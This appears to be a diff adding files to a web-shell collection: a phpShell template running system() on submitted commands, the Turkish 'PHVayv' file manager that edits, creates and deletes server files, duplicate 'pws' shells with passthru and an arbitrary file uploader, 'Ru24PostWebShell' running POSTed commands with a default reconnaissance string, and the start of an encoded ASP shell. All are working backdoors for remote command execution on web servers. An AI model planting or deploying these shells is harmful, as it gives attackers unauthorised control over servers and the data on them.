but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You can get a copy of the GNU General Public License from this
address: http://www.gnu.org/copyleft/gpl.html#SEC1
You can also write to the Free Software Foundation, Inc., 59 Temple
Place - Suite 330, Boston, MA 02111-1307, USA.
*/
?>
<html>
<head>
<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></title>
</head>
<body>
<h1>[YOUR HEADER[ <?php echo PHPSHELL_VERSION ?> [ADITTIONAL TEXT] -
[ADDITIONAL TEXT]</h1><br><hr><marquee><b>[ADDITIONAL MESSEGE OR TEXT]</b></marquee><hr><br>
<?php
if (ini_get(´register_globals´) != ´1´) {
/* We´ll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg(´^[[:blank:]]*cd[[:blank:]]+([^;]+)$´, $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == ´/´) {
$new_dir = $regs[1]; // ´cd /something/...´
} else {
$new_dir = $work_dir . ´/´ . $regs[1]; // ´cd somedir/...´
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like ´/foo/../bar´: */
$work_dir = exec(´pwd´);
?>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p>Current working directory: <b>
<?php
$work_dir_splitted = explode(´/´, substr($work_dir, 1));
echo ´<a xhref="´ . $PHP_SELF . ´?work_dir=/">Root</a>/´;
if (!empty($work_dir_splitted[0])) {
$path = ´´;
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= ´/´ . $work_dir_splitted[$i];
printf(´<a xhref="%s?work_dir=%s">%s</a>/´,
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ´.´) {
echo "<option value="$work_dir" selected>Current Directory</option> ";
} elseif ($dir == ´..´) {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There´s no
parent directory then. */
} elseif (strrpos($work_dir, ´/´) == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value="/">Parent Directory</option> ";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> ";
}
} else {
if ($work_dir == ´/´) {
echo "<option value="$work_dir$dir">$dir</option> ";
} else {
echo "<option value="$work_dir/$dir">$dir</option> ";
}
}
}
}
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam(´/tmp´, ´phpshell´);
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == ´ls´) {
/* ls looks much better with ´ -F´, IMHO. */
$command .= ´ -F´;
}
system($command);
}
?>
</textarea>
</form>
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
<hr>
<i>Copyright © 20042005, <a
href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
</body>
</html>

597
138shell/P/phvayv.php.txt Normal file
View file

@ -0,0 +1,597 @@
<? if($sistembilgisi > "") {phpinfo();} else { ?>
<?$fistik=PHVayv;?>
<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
<?if ($silklas > ""){rmdir($silklas);}?>
<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
<?if ($yenidosya == "1") {
$baglan=fopen("$dizin/$duzenx2",'w');
fwrite($baglan,$duzenx);
fclose($baglan);}
?>
<?if ($duzkaydet > "") {
$baglan=fopen($duzkaydet,'w');
fwrite($baglan,$duzenx);
fclose($baglan);}
?>
<?if ($yenklas>"") {;?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F" align="center" height="144">
<form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>"
<p align="center"><br>
<font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="37" maxlength="32"
name="duzenx2" value="Klasör Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
<p align="center">
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
&nbsp;</font></b></p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000" align="center" height="19">
&nbsp;</td>
</tr>
</table>
<? } else { ?>
<?if ($yendos>"") {;
?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F" align="center" height="455">
<form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>"
<p align="center"><br>
<font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="50" maxlength="32"
name="duzenx2" value="Dosya Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
</font></b>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span><br>
&nbsp;</p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000" align="center" height="19">
&nbsp;</td>
</tr>
</table>
<? } else { ?>
<?if ($duzenle>"") {;
?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
<tr>
<td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
<td bgcolor="#D6D6D6" height="1">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
<tr>
<td width="1" height="19"></td>
<td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
</tr>
<tr>
<td width="1" height="1"></td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F">
<form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<br>
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
while(! feof ( $baglan ) ){
$okunan=fgets($baglan,1024);
echo $okunan;
} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
</font></b>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000">
&nbsp;</td>
</tr>
</table>
<?
} else {
?>
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>PHVayv 1.0</title>
</head>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
<tr>
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
onmouseover='this.style.background="D9D9D9"'
onmouseout='this.style.background="9F9F9F"'
style="CURSOR: hand"
>
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
<font color="#000000">Üst Klasör</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
<tr>
<td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
</tr>
<tr>
<td bgcolor="#000000" height="20">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
<tr>
<td align="center" bgcolor="#5F5F5F"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
height="19" bordercolor="#000000">
<span style="font-weight: 700">
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
<tr>
<td width="30" height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
<td height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya
Adý</font></td>
<td width="122" height="17" bgcolor="#9F9F9F">
<p align="center">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
</tr>
</table>
<?
if ($sedat=@opendir($dizin)){
while (($ekinci=readdir ($sedat))){
if (is_dir("$dizin/$ekinci")){
?>
<? if ($ekinci=="." or $ekinci=="..") {
} else {
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
<tr>
<td width="30" height="17" bgcolor="#808080">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
<td height="17" bgcolor="#C4C4C4">
<font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
<font color="#000000">Aç</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
<font color="#000000">Sil</font></a>
</font></td>
</tr>
</table>
</td>
</tr>
</table>
<?
}
?>
<?
}}}
closedir($sedat);
?>
<?
if ($sedat=@opendir($dizin)){
while (($ekinci=readdir ($sedat))){
if (is_file("$dizin/$ekinci")){
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
<tr>
<td width="30" height="1" bgcolor="#B0B0B0">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
<td height="1" bgcolor="#EAEAEA">
<font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
<font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( XXX )&nbsp;</font></td>
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
<tr>
<td width="100%" bgcolor="#D6D6D6"
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
<font color="#000000">Düzenle</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
<tr>
<td width="100%" bgcolor="#D6D6D6" no wrap
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
<font color="#000000">Sil</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
<?
}}}
closedir($sedat);
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
</table>
<tr>
<td width="100%" bgcolor="#000000">
</body></html><? } ?><? } ?><? } ?><? } ?>

35
138shell/P/pws.php.txt Normal file
View file

@ -0,0 +1,35 @@
<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>
<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "FILE UPLOADED TO $dez";
}
?> </pre>
<form name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
</td>
</tr>
</table>
</body>
</html>

35
138shell/P/pws.txt Normal file
View file

@ -0,0 +1,35 @@
<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>
<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "FILE UPLOADED TO $dez";
}
?> </pre>
<form name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
</td>
</tr>
</table>
</body>
</html>

23
138shell/P/ru24_post_sh.txt Normal file
View file

@ -0,0 +1,23 @@
<?php
/*
Ru24PostWebShell
Writed by DreAmeRz
http://www.ru24-team.net
*/
error_reporting(0);
$function=passthru; // system, exec, cmd
echo "<html>
<head>
<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";
echo "<form method=post>";
echo "<input type=text name=cmd size=85>";
echo "</form>";
echo "<pre>";
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
echo "".$function($_POST['cmd'])."</pre></body></html>";
?>

116
138shell/R/Rader.asp.txt Normal file
View file

@ -0,0 +1,116 @@
<%@ LANGUAGE = VBScript.Encode %>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Language" content="tr">
<!--
   
   
    
    HACKING
    Mehdi & HolyDemon
   www.infilak.tr.cx & www.infilaktim.tk
  
-->
<%#@~^FAAAAA==G PnMDKDPM+k;:PU+XYtwcAAA==^#~@%>
